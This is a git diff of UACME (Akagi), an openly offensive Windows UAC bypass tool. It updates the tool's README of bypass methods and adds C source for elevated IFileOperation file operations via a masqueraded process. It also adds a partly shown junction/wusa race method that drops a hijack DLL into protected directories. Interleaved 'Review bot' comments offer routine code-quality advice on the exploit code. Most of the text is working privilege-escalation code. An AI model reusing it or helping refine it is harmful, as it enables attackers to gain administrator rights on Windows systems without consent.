diff --git a/Compiled/Akagi32.exe b/Compiled/Akagi32.exe
index 359314e..b2ad6e4 100644
Binary files a/Compiled/Akagi32.exe and b/Compiled/Akagi32.exe differ
diff --git a/Compiled/Akagi64.exe b/Compiled/Akagi64.exe
index 589d08b..d7242d7 100644
Binary files a/Compiled/Akagi64.exe and b/Compiled/Akagi64.exe differ
diff --git a/README.md b/README.md
index de55f61..c654831 100644
--- a/README.md
+++ b/README.md
@@ -244,9 +244,9 @@ Keys (watch debug output with dbgview or similar for more info):
* Method: Registry key manipulation
* Target(s): \system32\sdctl.exe
* Component(s): Attacker defined application
- * Works from: Windows 10 (10240)
- * Fixed in: unfixed :see_no_evil:
- * How: -
+ * Works from: Windows 10 TH1 (10240)
+ * Fixed in: Windows 10 RS3 (16215)
+ * How: Shell API update
30. Author: Leo Davidson derivative, lhc645
* Type: Dll Hijack
* Method: WOW64 logger
@@ -260,7 +260,7 @@ Keys (watch debug output with dbgview or similar for more info):
* Method: Registry key manipulation
* Target(s): \system32\sdctl.exe
* Component(s): Attacker defined application
- * Works from: Windows 10 (10240)
+ * Works from: Windows 10 TH1 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
32. Author: xi-tauw
@@ -276,7 +276,7 @@ Keys (watch debug output with dbgview or similar for more info):
* Method: Registry key manipulation
* Target(s): \system32\fodhelper.exe
* Component(s): Attacker defined application
- * Works from: Windows 10 (10240)
+ * Works from: Windows 10 TH1 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
34. Author: James Forshaw
@@ -297,11 +297,19 @@ Keys (watch debug output with dbgview or similar for more info):
* AlwaysNotify compatible, see note
* Fixed in: unfixed :see_no_evil:
* How: -
+36. Author: Thomas Vanhoutte
+ * Type: Race condition
+ * Method: NTFS reparse point & Dll Hijack
+ * Target(s): wusa.exe
+ * Component(s): dcomcnfg.exe, mmc.exe, ole32.dll, MsCoree.dll
+ * Works from: Windows 7 (7600)
+ * Fixed in: unfixed :see_no_evil:
+ * How: -
Note:
* Method (6) unavailable in wow64 environment starting from Windows 8;
* Method (11) implemented in x86-32 version;
-* Method (13) (19) and above implemented only in x64 version;
+* Method (13) (19) implemented only in x64 version;
* Method (14) require process injection, wow64 unsupported, use x64 version of this tool;
* Method (26) is still working, however it main advantage was UAC bypass on AlwaysNotify level. Since 15031 it is gone;
* Method (30) require x64 because it abuses WOW64 subsystem feature;
diff --git a/Source/Akagi/Resource.rc b/Source/Akagi/Resource.rc
index 7275d07..304d392 100644
Binary files a/Source/Akagi/Resource.rc and b/Source/Akagi/Resource.rc differ
diff --git a/Source/Akagi/bin/Akatsuki64.cd b/Source/Akagi/bin/Akatsuki64.cd
index 0d12cbd..97a78a2 100644
Binary files a/Source/Akagi/bin/Akatsuki64.cd and b/Source/Akagi/bin/Akatsuki64.cd differ
diff --git a/Source/Akagi/bin/Ikazuchi32.cd b/Source/Akagi/bin/Ikazuchi32.cd
index 733b633..78eade9 100644
Binary files a/Source/Akagi/bin/Ikazuchi32.cd and b/Source/Akagi/bin/Ikazuchi32.cd differ
diff --git a/Source/Akagi/bin/Ikazuchi64.cd b/Source/Akagi/bin/Ikazuchi64.cd
index bf515b9..0100e4b 100644
Binary files a/Source/Akagi/bin/Ikazuchi64.cd and b/Source/Akagi/bin/Ikazuchi64.cd differ
diff --git a/Source/Akagi/bin/fubuki32.cd b/Source/Akagi/bin/fubuki32.cd
index d609808..78e2bc9 100644
Binary files a/Source/Akagi/bin/fubuki32.cd and b/Source/Akagi/bin/fubuki32.cd differ
diff --git a/Source/Akagi/bin/fubuki64.cd b/Source/Akagi/bin/fubuki64.cd
index eacd7d5..bd84ab3 100644
Binary files a/Source/Akagi/bin/fubuki64.cd and b/Source/Akagi/bin/fubuki64.cd differ
diff --git a/Source/Akagi/bin/hibiki32.cd b/Source/Akagi/bin/hibiki32.cd
index 84cfff6..9196ee7 100644
Binary files a/Source/Akagi/bin/hibiki32.cd and b/Source/Akagi/bin/hibiki32.cd differ
diff --git a/Source/Akagi/bin/hibiki64.cd b/Source/Akagi/bin/hibiki64.cd
index 3fc729e..51c29e7 100644
Binary files a/Source/Akagi/bin/hibiki64.cd and b/Source/Akagi/bin/hibiki64.cd differ
diff --git a/Source/Akagi/consts.h b/Source/Akagi/consts.h
index 311fb15..3a618c2 100644
--- a/Source/Akagi/consts.h
+++ b/Source/Akagi/consts.h
@@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
-* VERSION: 2.72
+* VERSION: 2.74
*
-* DATE: 26 May 2017
+* DATE: 20 June 2017
*
* Global consts definition file.
*
@@ -24,6 +24,7 @@
#define T_UACKEY L"MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system"
#define T_APP_PATH L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\"
+#define T_DOTNET_CLIENT L"Software\\Microsoft\\Windows NT\\CurrentVersion\\KnownFunctionTableDlls"
#define T_EXEFILE_SHELL L"Software\\Classes\\exefile\\shell\\runas\\command"
#define T_MSSETTINGS L"Software\\Classes\\ms-settings"
#define T_SHELL_OPEN_COMMAND L"\\shell\\open\\command"
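Review bot: The name `T_DOTNET_CLIENT` on the new `#define` line describes an intended use rather than the value, which is the `KnownFunctionTableDlls` key under `Windows NT\CurrentVersion`; someone searching the sources for that key name will not find this constant. Either a name that reflects the key, such as `T_KNOWN_FUNCTION_TABLE_DLLS`, or a trailing comment `// HKLM key whose values are enumerated by ucmJunctionMethod` would make the lookup in hybrids.c self-explanatory. The `GDIPLUS_DLL` constant added in the next hunk of this file is not referenced by any hunk in this diff; presumably it is used by a file outside this excerpt, otherwise it is a dead definition.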
@@ -56,6 +57,7 @@
#define DISMCORE_DLL L"dismcore.dll"
#define DUSER_DLL L"duser.dll"
#define ELSEXT_DLL L"elsext.dll"
+#define GDIPLUS_DLL L"GdiPlus.dll"
#define HIBIKI_DLL L"Hibiki.dll"
#define KERNEL32_DLL L"kernel32.dll"
#define LOGPROVIDER_DLL L"LogProvider.dll"
@@ -80,6 +82,7 @@
#define CONSENT_EXE L"consent.exe"
#define CONTROL_EXE L"control.exe"
#define CREDWIZ_EXE L"credwiz.exe"
+#define DCOMCNFG_EXE L"dcomcnfg.exe"
#define EVENTVWR_EXE L"eventvwr.exe"
#define EXPLORER_EXE L"explorer.exe"
#define FODHELPER_EXE L"fodhelper.exe"
diff --git a/Source/Akagi/global.h b/Source/Akagi/global.h
index 428e3de..870881f 100644
--- a/Source/Akagi/global.h
+++ b/Source/Akagi/global.h
@@ -4,9 +4,9 @@
*
* TITLE: GLOBAL.H
*
-* VERSION: 2.72
+* VERSION: 2.74
*
-* DATE: 24 May 2017
+* DATE: 10 June 2017
*
* Common header file for the program support routines.
*
@@ -37,6 +37,7 @@
#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
+#pragma warning(disable: 6258) // Using TerminateThread does not allow proper thread clean up
#pragma warning(disable: 6320) // exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER
#define PAYLOAD_ID_NONE MAXDWORD
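Review bot: The new `#pragma warning(disable: 6258)` line silences the TerminateThread analysis warning for every translation unit that includes global.h, not just for the call that triggered it. A `#pragma warning(suppress: 6258)` placed on the line before the actual TerminateThread call keeps the analyzer active everywhere else, so a later unsafe use is still reported; that call site is not in this diff, so I cannot point at it. If the file-wide disable is deliberate, the trailing comment should say why terminating the thread is acceptable here rather than only repeating the warning text.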
@@ -63,7 +64,7 @@
#include "shared\minirtl.h"
#include "shared\cmdline.h"
#include "shared\_filename.h"
-#include "Shared\ldr.h"
+#include "shared\ldr.h"
#include "consts.h"
#include "compress.h"
#include "sup.h"
@@ -86,7 +87,7 @@ typedef struct _UACME_CONTEXT {
ULONG dwBuildNumber;
ULONG AkagiFlag;
ULONG IFileOperationFlags;
- ULONG OptionalParameterLength;
+ ULONG OptionalParameterLength; //count of characters
WCHAR szSystemDirectory[MAX_PATH + 1];//with end slash
WCHAR szTempDirectory[MAX_PATH + 1]; //with end slash
WCHAR szOptionalParameter[MAX_PATH + 1]; //limited to MAX_PATH
diff --git a/Source/Akagi/main.c b/Source/Akagi/main.c
index c79d1ae..6fb5d93 100644
--- a/Source/Akagi/main.c
+++ b/Source/Akagi/main.c
@@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
-* VERSION: 2.72
+* VERSION: 2.73
*
-* DATE: 26 May 2017
+* DATE: 08 June 2017
*
* Program entry point.
*
@@ -136,8 +136,8 @@ UINT ucmInit(
bytesIO = 0;
GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, &bytesIO);
if (bytesIO > 0) {
- g_ctx.OptionalParameterLength = bytesIO;
_strcpy(g_ctx.szOptionalParameter, szBuffer);
+ g_ctx.OptionalParameterLength = 1 + bytesIO; //including 0
}
wincls.cbSize = sizeof(WNDCLASSEX);
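Review bot: The moved assignment stores `1 + bytesIO` with the comment `//including 0`, while the field comment added to global.h in this commit says only `//count of characters`, so a reader of the struct cannot tell that the terminator is counted. Make the two agree, e.g. `ULONG OptionalParameterLength; //count of characters, including terminating null`. The name `bytesIO` also suggests a byte count although it is used here as a WCHAR count (the value is copied into a `WCHAR` buffer and one is added for the null); a comment noting that GetCommandLineParam appears to report characters would avoid a future sizeof(WCHAR) mix-up. ucmInit begins and ends outside this hunk.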
diff --git a/Source/Akagi/methods/carberp.c b/Source/Akagi/methods/carberp.c
index a668785..e6597a8 100644
--- a/Source/Akagi/methods/carberp.c
+++ b/Source/Akagi/methods/carberp.c
@@ -4,9 +4,9 @@
*
* TITLE: CARBERP.C
*
-* VERSION: 2.70
+* VERSION: 2.74
*
-* DATE: 25 Mar 2017
+* DATE: 10 June 2017
*
* Tweaked Carberp methods.
* Original Carberp is exploiting mcx2prov.exe in ehome.
@@ -18,52 +18,6 @@
*
*******************************************************************************/
#include "global.h"
-#include "makecab.h"
-
-/*
-* ucmWusaExtractPackage
-*
-* Purpose:
-*
-* Extract cab to protected directory using wusa.
-* This routine expect source as ellocnak.msu cab file in the temp folder.
-*
-*/
-BOOL ucmWusaExtractPackage(
- _In_ LPWSTR lpTargetDirectory
-)
-{
- BOOL bResult = FALSE;
- SIZE_T Size;
- LPWSTR lpCommandLine = NULL;
- WCHAR szMsuFileName[MAX_PATH * 2];
-
- if (lpTargetDirectory == NULL)
- return FALSE;
-
- RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
- _strcpy(szMsuFileName, g_ctx.szTempDirectory);
- _strcat(szMsuFileName, ELLOCNAK_MSU);
-
- Size = ((1 + _strlen(lpTargetDirectory) +
- _strlen(szMsuFileName) +
- MAX_PATH) * sizeof(WCHAR));
-
- lpCommandLine = (LPWSTR)supHeapAlloc(Size);
- if (lpCommandLine) {
-
- _strcpy(lpCommandLine, L"/c wusa ");
- _strcat(lpCommandLine, szMsuFileName);
- _strcat(lpCommandLine, L" /extract:");
- _strcat(lpCommandLine, lpTargetDirectory);
-
- bResult = supRunProcess(CMD_EXE, lpCommandLine);
-
- supHeapFree(lpCommandLine);
- }
- DeleteFileW(szMsuFileName);
- return bResult;
-}
/*
* ucmWusaMethod
@@ -142,55 +96,5 @@ BOOL ucmWusaMethod(
} while (cond);
-
- return bResult;
-}
-
-/*
-* ucmCreateCabinetForSingleFile
-*
-* Purpose:
-*
-* Build cabinet for usage in methods where required 1 file.
-*
-*/
-BOOL ucmCreateCabinetForSingleFile(
- _In_ LPWSTR lpSourceDll,
- _In_ PVOID ProxyDll,
- _In_ DWORD ProxyDllSize
-)
-{
- BOOL cond = FALSE, bResult = FALSE;
- CABDATA *Cabinet = NULL;
- LPWSTR lpFileName;
- WCHAR szMsuFileName[MAX_PATH * 2];
-
- if ((ProxyDll == NULL) ||
- (ProxyDllSize == 0) ||
- (lpSourceDll == NULL)) return bResult;
-
- do {
-
- //drop proxy dll
- if (!supWriteBufferToFile(lpSourceDll, ProxyDll, ProxyDllSize)) {
- break;
- }
-
- //build cabinet
- RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
- _strcpy(szMsuFileName, g_ctx.szTempDirectory);
- _strcat(szMsuFileName, ELLOCNAK_MSU);
-
- Cabinet = cabCreate(szMsuFileName);
- if (Cabinet == NULL)
- break;
-
- lpFileName = _filename(lpSourceDll);
- //put file without compression
- bResult = cabAddFile(Cabinet, lpSourceDll, lpFileName);
- cabClose(Cabinet);
-
- } while (cond);
-
return bResult;
}
diff --git a/Source/Akagi/methods/carberp.h b/Source/Akagi/methods/carberp.h
index ed34b7d..63b37c4 100644
--- a/Source/Akagi/methods/carberp.h
+++ b/Source/Akagi/methods/carberp.h
@@ -4,9 +4,9 @@
*
* TITLE: CARBERP.H
*
-* VERSION: 2.70
+* VERSION: 2.74
*
-* DATE: 25 Mar 2017
+* DATE: 10 June 2017
*
* Prototypes and definitions for Carberp method.
*
@@ -22,11 +22,3 @@ BOOL ucmWusaMethod(
_In_ UCM_METHOD Method,
PVOID ProxyDll,
DWORD ProxyDllSize);
-
-BOOL ucmWusaExtractPackage(
- _In_ LPWSTR lpTargetDirectory);
-
-BOOL ucmCreateCabinetForSingleFile(
- _In_ LPWSTR lpSourceDll,
- _In_ PVOID ProxyDll,
- _In_ DWORD ProxyDllSize);
diff --git a/Source/Akagi/methods/comfileop.c b/Source/Akagi/methods/comfileop.c
new file mode 100644
index 0000000..23bf382
--- /dev/null
+++ b/Source/Akagi/methods/comfileop.c
@@ -0,0 +1,333 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2017
+*
+* TITLE: COMFILEOP.C
+*
+* VERSION: 2.74
+*
+* DATE: 10 June 2017
+*
+* IFileOperation based routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#include "global.h"
+
+/*
+* ucmMasqueradedCoGetObjectElevate
+*
+* Purpose:
+*
+* CoGetObject elevation as admin.
+*
+*/
+HRESULT ucmMasqueradedCoGetObjectElevate(
+ _In_ LPWSTR clsid,
+ _In_ DWORD dwClassContext,
+ _In_ REFIID riid,
+ _Outptr_ void **ppv
+)
+{
+ HRESULT r = E_FAIL;
+ BIND_OPTS3 bop;
+ WCHAR szElevationMoniker[MAX_PATH];
+
+ if (clsid == NULL)
+ return r;
+
+ if (_strlen(clsid) > 64)
+ return r;
+
+ RtlSecureZeroMemory(szElevationMoniker, sizeof(szElevationMoniker));
+
+ _strcpy(szElevationMoniker, L"Elevation:Administrator!new:");
+ _strcat(szElevationMoniker, clsid);
+
+ RtlSecureZeroMemory(&bop, sizeof(bop));
+ bop.cbStruct = sizeof(bop);
+ bop.dwClassContext = dwClassContext;
+
+ return CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, riid, ppv);
+}
+
+/*
+* ucmMasqueradedRenameElementCOM
+*
+* Purpose:
+*
+* Rename file/directory autoelevated.
+* This function expects that supMasqueradeProcess was called on process initialization.
+*
+*/
+BOOL ucmMasqueradedRenameElementCOM(
+ _In_ LPWSTR OldName,
+ _In_ LPWSTR NewName
+)
+{
+ BOOL bCond = FALSE, bResult = FALSE;
+ IFileOperation *FileOperation1 = NULL;
+ IShellItem *psiDestDir = NULL;
+ HRESULT r = E_FAIL;
+
+ do {
+
+ if ((OldName == NULL) || (NewName == NULL))
+ break;
+
+ r = CoCreateInstance(&CLSID_FileOperation, NULL,
+ CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation1);
+
+ if (r != S_OK) {
+ break;
+ }
+
+ if (FileOperation1 != NULL) {
+ FileOperation1->lpVtbl->Release(FileOperation1);
+ }
+
+ r = ucmMasqueradedCoGetObjectElevate(
+ T_CLSID_FileOperation,
+ CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
+ &IID_IFileOperation,
+ &FileOperation1);
+
+ if (r != S_OK) {
+ break;
+ }
+ if (FileOperation1 == NULL) {
+ r = E_FAIL;
+ break;
+ }
+
+ FileOperation1->lpVtbl->SetOperationFlags(FileOperation1, g_ctx.IFileOperationFlags);
+
+ r = SHCreateItemFromParsingName(OldName, NULL, &IID_IShellItem, &psiDestDir);
+ if (r != S_OK) {
+ break;
+ }
+
+ r = FileOperation1->lpVtbl->RenameItem(FileOperation1, psiDestDir, NewName, NULL);
+ if (r != S_OK) {
+ break;
+ }
+
+ r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
+ if (r != S_OK) {
+ break;
+ }
+
+ psiDestDir->lpVtbl->Release(psiDestDir);
+ psiDestDir = NULL;
+
+ bResult = TRUE;
+
+ } while (bCond);
+
+ if (FileOperation1 != NULL) {
+ FileOperation1->lpVtbl->Release(FileOperation1);
+ }
+
+ if (psiDestDir != NULL) {
+ psiDestDir->lpVtbl->Release(psiDestDir);
+ }
+
+ return bResult;
+}
+
+/*
+* ucmMasqueradedCreateSubDirectoryCOM
+*
+* Purpose:
+*
+* Create directory autoelevated.
+* This function expects that supMasqueradeProcess was called on process initialization.
+*
+*/
+BOOL ucmMasqueradedCreateSubDirectoryCOM(
+ _In_ LPWSTR ParentDirectory,
+ _In_ LPWSTR SubDirectory
+)
+{
+ BOOL bCond = FALSE, bResult = FALSE;
+ IFileOperation *FileOperation1 = NULL;
+ IShellItem *psiDestDir = NULL;
+ HRESULT r = E_FAIL;
+
+ do {
+
+ if ((SubDirectory == NULL) || (ParentDirectory == NULL))
+ break;
+
+ r = CoCreateInstance(&CLSID_FileOperation, NULL,
+ CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation1);
+
+ if (r != S_OK) {
+ break;
+ }
+
+ if (FileOperation1 != NULL) {
+ FileOperation1->lpVtbl->Release(FileOperation1);
+ }
+
+ r = ucmMasqueradedCoGetObjectElevate(
+ T_CLSID_FileOperation,
+ CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
+ &IID_IFileOperation,
+ &FileOperation1);
+
+ if (r != S_OK) {
+ break;
+ }
+ if (FileOperation1 == NULL) {
+ r = E_FAIL;
+ break;
+ }
+
+ FileOperation1->lpVtbl->SetOperationFlags(FileOperation1, g_ctx.IFileOperationFlags);
+
+ r = SHCreateItemFromParsingName(ParentDirectory, NULL, &IID_IShellItem, &psiDestDir);
+ if (r != S_OK) {
+ break;
+ }
+
+ r = FileOperation1->lpVtbl->NewItem(FileOperation1, psiDestDir, FILE_ATTRIBUTE_DIRECTORY, SubDirectory, NULL, NULL);
+ if (r != S_OK) {
+ break;
+ }
+
+ r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
+ if (r != S_OK) {
+ break;
+ }
+
+ psiDestDir->lpVtbl->Release(psiDestDir);
+ psiDestDir = NULL;
+
+ bResult = TRUE;
+
+ } while (bCond);
+
+ if (FileOperation1 != NULL) {
+ FileOperation1->lpVtbl->Release(FileOperation1);
+ }
+
+ if (psiDestDir != NULL) {
+ psiDestDir->lpVtbl->Release(psiDestDir);
+ }
+
+ return bResult;
+}
+
+/*
+* ucmMasqueradedMoveCopyFileCOM
+*
+* Purpose:
+*
+* Move or Copy file autoelevated.
+* This function expects that supMasqueradeProcess was called on process initialization.
+*
+*/
+BOOL ucmMasqueradedMoveCopyFileCOM(
+ _In_ LPWSTR SourceFileName,
+ _In_ LPWSTR DestinationDir,
+ _In_ BOOL fMove
+)
+{
+ BOOL cond = FALSE;
+ IFileOperation *FileOperation1 = NULL;
+ IShellItem *isrc = NULL, *idst = NULL;
+ SHELLEXECUTEINFOW shexec;
+ HRESULT r = E_FAIL;
+
+ do {
+
+ if ((SourceFileName == NULL) || (DestinationDir == NULL))
+ break;
+
+ RtlSecureZeroMemory(&shexec, sizeof(shexec));
+
+ r = CoCreateInstance(&CLSID_FileOperation, NULL,
+ CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation1);
+
+ if (r != S_OK)
+ break;
+
+ if (FileOperation1 != NULL)
+ FileOperation1->lpVtbl->Release(FileOperation1);
+
+ r = ucmMasqueradedCoGetObjectElevate(
+ T_CLSID_FileOperation,
+ CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
+ &IID_IFileOperation,
+ &FileOperation1);
+
+ if (r != S_OK)
+ break;
+
+ if (FileOperation1 == NULL) {
+ r = E_FAIL;
+ break;
+ }
+
+ FileOperation1->lpVtbl->SetOperationFlags(FileOperation1, g_ctx.IFileOperationFlags);
+
+ r = SHCreateItemFromParsingName(SourceFileName, NULL, &IID_IShellItem, &isrc);
+ if (r != S_OK)
+ break;
+
+ r = SHCreateItemFromParsingName(DestinationDir, NULL, &IID_IShellItem, &idst);
+ if (r != S_OK)
+ break;
+
+ if (fMove)
+ r = FileOperation1->lpVtbl->MoveItem(FileOperation1, isrc, idst, NULL, NULL);
+ else
+ r = FileOperation1->lpVtbl->CopyItem(FileOperation1, isrc, idst, NULL, NULL);
+
+ if (r != S_OK)
+ break;
+
+ r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
+ if (r != S_OK)
+ break;
+
+ idst->lpVtbl->Release(idst);
+ idst = NULL;
+ isrc->lpVtbl->Release(isrc);
+ isrc = NULL;
+
+ } while (cond);
+
+ if (FileOperation1 != NULL)
+ FileOperation1->lpVtbl->Release(FileOperation1);
+
+ if (isrc != NULL)
+ isrc->lpVtbl->Release(isrc);
+
+ if (idst != NULL)
+ idst->lpVtbl->Release(idst);
+
+ return (SUCCEEDED(r));
+}
+
+/*
+* ucmMasqueradedMoveFileCOM
+*
+* Purpose:
+*
+* Move file autoelevated.
+* This function expects that supMasqueradeProcess was called on process initialization.
+*
+*/
+BOOL ucmMasqueradedMoveFileCOM(
+ _In_ LPWSTR SourceFileName,
+ _In_ LPWSTR DestinationDir
+)
+{
+ return ucmMasqueradedMoveCopyFileCOM(SourceFileName, DestinationDir, TRUE);
+}
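Review bot: `SHELLEXECUTEINFOW shexec` in ucmMasqueradedMoveCopyFileCOM is declared and zeroed (`RtlSecureZeroMemory(&shexec, sizeof(shexec));`) but never read afterwards, so both lines can be deleted. The return value of `SetOperationFlags` is ignored in all three IFileOperation routines; assigning it to `r` and adding `if (r != S_OK) break;` would match how every other call in those functions is handled. The routines are moved verbatim from pitou.c (the removed lines there are identical), so a line in the file header such as `Moved from pitou.c in 2.74` would help anyone tracing history. Note also that ucmMasqueradedMoveCopyFileCOM reports `SUCCEEDED(r)` while its siblings return a separate `bResult`; the two conventions produce the same result here but one should be chosen for the file.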
diff --git a/Source/Akagi/methods/comfileop.h b/Source/Akagi/methods/comfileop.h
new file mode 100644
index 0000000..43cc969
--- /dev/null
+++ b/Source/Akagi/methods/comfileop.h
@@ -0,0 +1,42 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2017
+*
+* TITLE: COMFILEOP.H
+*
+* VERSION: 2.74
+*
+* DATE: 10 June 2017
+*
+* Prototypes and definitions for IFileOperation based routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+
+HRESULT ucmMasqueradedCoGetObjectElevate(
+ _In_ LPWSTR clsid,
+ _In_ DWORD dwClassContext,
+ _In_ REFIID riid,
+ _Outptr_ void **ppv);
+
+BOOL ucmMasqueradedCreateSubDirectoryCOM(
+ _In_ LPWSTR ParentDirectory,
+ _In_ LPWSTR SubDirectory);
+
+BOOL ucmMasqueradedMoveCopyFileCOM(
+ _In_ LPWSTR SourceFileName,
+ _In_ LPWSTR DestinationDir,
+ _In_ BOOL fMove);
+
+BOOL ucmMasqueradedMoveFileCOM(
+ _In_ LPWSTR SourceFileName,
+ _In_ LPWSTR DestinationDir);
+
+BOOL ucmMasqueradedRenameElementCOM(
+ _In_ LPWSTR OldName,
+ _In_ LPWSTR NewName);
diff --git a/Source/Akagi/methods/enigma0x3.c b/Source/Akagi/methods/enigma0x3.c
index 4510c90..26b8ada 100644
--- a/Source/Akagi/methods/enigma0x3.c
+++ b/Source/Akagi/methods/enigma0x3.c
@@ -4,9 +4,9 @@
*
* TITLE: ENIGMA0X3.C
*
-* VERSION: 2.73
+* VERSION: 2.74
*
-* DATE: 27 May 2017
+* DATE: 20 June 2017
*
* Enigma0x3 autoelevation methods and everything based on the same
* ShellExecute related registry manipulations idea.
@@ -62,7 +62,7 @@ BOOL ucmHijackShellCommandMethod(
sz = 0x1000;
}
else {
- sz = _strlen(lpszPayload) * sizeof(WCHAR);
+ sz = (1 + _strlen(lpszPayload)) * sizeof(WCHAR);
}
lpBuffer = supHeapAlloc(sz);
if (lpBuffer == NULL)
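Review bot: The `1 +` added to the size computation carries no comment saying it reserves room for the terminating null, and the same unexplained expression appears in the ucmAppPathMethod hunk later in this file. A trailing comment such as `//including terminating null`, matching the `//including 0` wording used in main.c in this commit, would stop the next reader from "simplifying" it away. Both enclosing functions begin and end outside their hunks, so I cannot confirm how `sz` later bounds the copy into `lpBuffer`.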
@@ -162,7 +162,8 @@ DWORD ucmDiskCleanupWorkerThread(
InitializeObjectAttributes(&ObjectAttributes, &usName, OBJ_CASE_INSENSITIVE, 0, NULL);
- status = NtCreateFile(&hDirectory, FILE_LIST_DIRECTORY | SYNCHRONIZE,
+ status = NtCreateFile(&hDirectory,
+ FILE_LIST_DIRECTORY | SYNCHRONIZE,
&ObjectAttributes,
&IoStatusBlock,
NULL,
@@ -171,8 +172,7 @@ DWORD ucmDiskCleanupWorkerThread(
FILE_OPEN,
FILE_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
- 0
- );
+ 0);
if (!NT_SUCCESS(status))
break;
@@ -362,7 +362,7 @@ BOOL ucmAppPathMethod(
sz = 0x1000;
}
else {
- sz = _strlen(lpszPayload) * sizeof(WCHAR);
+ sz = (1 + _strlen(lpszPayload)) * sizeof(WCHAR);
}
lpBuffer = supHeapAlloc(sz);
if (lpBuffer == NULL)
diff --git a/Source/Akagi/methods/hybrids.c b/Source/Akagi/methods/hybrids.c
index 8c04620..d64bfc5 100644
--- a/Source/Akagi/methods/hybrids.c
+++ b/Source/Akagi/methods/hybrids.c
@@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.C
*
-* VERSION: 2.71
+* VERSION: 2.74
*
-* DATE: 06 May 2017
+* DATE: 20 June 2017
*
* Hybrid UAC bypass methods.
*
@@ -1738,3 +1738,136 @@ BOOL ucmUiAccessMethod(
return bResult;
}
+
+/*
+* ucmJunctionMethod
+*
+* Purpose:
+*
+* Bypass UAC using two different steps:
+*
+* 1) Create wusa.exe race condition and force wusa to copy files to the protected directory using NTFS reparse point.
+* 2) Dll hijack dotnet dependencies.
+*
+* Wusa race condition in combination with junctions found by Thomas Vanhoutte.
+* Twitter: https://twitter.com/SandboxEscaper
+* Blog: https://thomas-vanhoutte.blogspot.be
+*
+*/
+BOOL ucmJunctionMethod(
+ PVOID ProxyDll,
+ DWORD ProxyDllSize
+)
+{
+ BOOL bResult = FALSE, bDropComplete = FALSE, bCond = FALSE;
+ HKEY hKey = NULL;
+ LRESULT lResult;
+
+ LPWSTR lpTargetDirectory = NULL, lpEnd = NULL;
+
+ DWORD i, cValues = 0, cbMaxValueNameLen = 0, bytesIO;
+
+ WCHAR szBuffer[MAX_PATH * 2];
+ WCHAR szSource[MAX_PATH * 2];
+
+ do {
+
+ //
+ // Drop payload dll to %temp% and make cab for it.
+ //
+ RtlSecureZeroMemory(szSource, sizeof(szSource));
+ _strcpy(szSource, g_ctx.szTempDirectory);
+
+ if (g_ctx.dwBuildNumber < 9600) {
+ _strcat(szSource, OLE32_DLL);
+ }
+ else {
+ _strcat(szSource, MSCOREE_DLL);
+ }
+ if (!ucmCreateCabinetForSingleFile(szSource, ProxyDll, ProxyDllSize))
+ break;
+
+ //
+ // Locate target directory.
+ //
+ lResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, T_DOTNET_CLIENT, 0, MAXIMUM_ALLOWED, &hKey);
+ if (lResult != ERROR_SUCCESS)
+ break;
+
+ lResult = RegQueryInfoKey(hKey,
+ NULL,
+ NULL,
+ NULL,
+ NULL,
+ NULL,
+ NULL,
+ &cValues,
+ &cbMaxValueNameLen,
+ NULL,
+ NULL,
+ NULL);
+
+ if (lResult != ERROR_SUCCESS)
+ break;
+
+ if ((cValues == 0) || (cbMaxValueNameLen == 0))
+ break;
+
+ if (cbMaxValueNameLen > MAX_PATH)
+ break;
+
+ bDropComplete = FALSE;
+
+ //
+ // Drop file in each.
+ //
+ for (i = 0; i < cValues; i++) {
+
+ RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
+ bytesIO = MAX_PATH;
+
+ lResult = RegEnumValue(hKey,
+ i,
+ (LPWSTR)&szBuffer,
+ &bytesIO,
+ NULL,
+ NULL,
+ NULL,
+ NULL);
+
+ lpTargetDirectory = _filepath(szBuffer, szBuffer);
+ if (lpTargetDirectory == NULL) {
+ bDropComplete = FALSE;
+ break;
+ }
+
+ lpEnd = _strend(lpTargetDirectory);
